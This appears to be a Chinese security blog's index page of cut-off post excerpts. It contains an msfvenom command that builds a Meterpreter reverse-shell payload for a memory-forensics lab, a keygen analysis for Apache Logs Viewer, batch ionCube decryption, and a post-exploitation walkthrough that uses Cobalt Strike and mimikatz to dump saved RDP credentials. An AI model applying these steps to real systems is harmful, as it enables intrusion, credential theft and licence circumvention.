日常

记录下Volatility使用过程 环境 Parrot *1 Windows 2008*1 先生成个msf马子 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe 拷到Windows2008机器上运行后迁移进程 然后使用dumpit对内存做完整镜像 做好后的镜像大小取决于机器内存的大小，机器内存越大，镜像后的文件越大 拷回parrot，开始分析 分析命令如下 volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程，这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo来确定使用配置文件的 ┌─[[email protected] ...

背景项目中碰到个用ionCube V10加密的源码，需要解密做审计，记录下踩的坑 文件数量2000多，找了一番网站发现https://easytoyou.eu/可以提供解密服务， BTW，这个站一次只能上传一个文件，手动点2000多次不说累死也得烦死 过程按照惯例，先注册个号看看有什么功能 好嘛 10欧元30天会员，冲了再看看解密面板 面板变了，上传个加密的文件抓个包看看 解密完成后在页面中回显下载链接，那么就可以写脚本批量跑了。 思路脚本需要实现的功能是遍历所有指定格式的文件，保存获取到的列表，上传解密，下载解密后的文件 直接贴代码 遍历符合格式的文件代码# Load Foldersdef get_all_path(self): if os.path.exists(self.FileList): pass else: postfix = set(['php']) # 设置要记录的文件格式 for maindir, subdir, file_name_list in os.walk(self.dstFolder): ...

您好, 这里需要密码.58cc31d2a5ffa547a5231a78ad12f908ebf32328cb4ad707322d590d8bee86542959e0f428099d962cb7d3635b3357cee6235494c007f8cdedb267add9ae449d7b3e057fe94f117443540fa25536f8495c5c8cbf740d9f5b2ff4c6169ca7e58b9422c46c2eb29540f2226d161bb7066487e72b489f21e279d605ae30186809553fb9458a8fad16409f534bea7074a49045b4c13568c88dfc19d2e64f654a02a8278a58f3e02007dd62d43db6da95cff54679d54cfd8dac067944f3a7b8f64f92931b58854b09a78ee22cc474bc67d6b15146e1d15f018930e4e837a9b2e02cbde0a2302367faac3c0413f115443ce444897f6aacb ...

做项目时发现一个站点为前后分离的架构，翻了下发现了map文件，采用restore-source-tree还原时报错，记录下解决过程 安装先从git克隆到本地 git clone https://github.com/laysent/restore-source-tree.git 然后进入文件夹 npm install 这里建议挂个代理、VPN，国内很慢 这里在win下会报错 λ npm cinstall npm WARN deprecated [email protected]: � Thanks for using Babel: we recommend using babel-preset-env now: please read https://bab ...

抽空研究了下ALV的注册机制，写了个注册机 分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法，当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验，详细流程见如下代码 unlockCodeToolStripMenuItem_Click方法 private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if (string.IsNul ...

拿下一台运维机，上了个CS，发现曾经连接过几台服务器并且保存了凭据，网上查了圈发现CS不支持交互式mimikatz，记录下获取远程主机RDP凭据。 Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials 可通过命令行获取，执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行，system下执行无结果。 使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID 输出应类似 **BLOB** dwVersion : 00000001 - 1 ...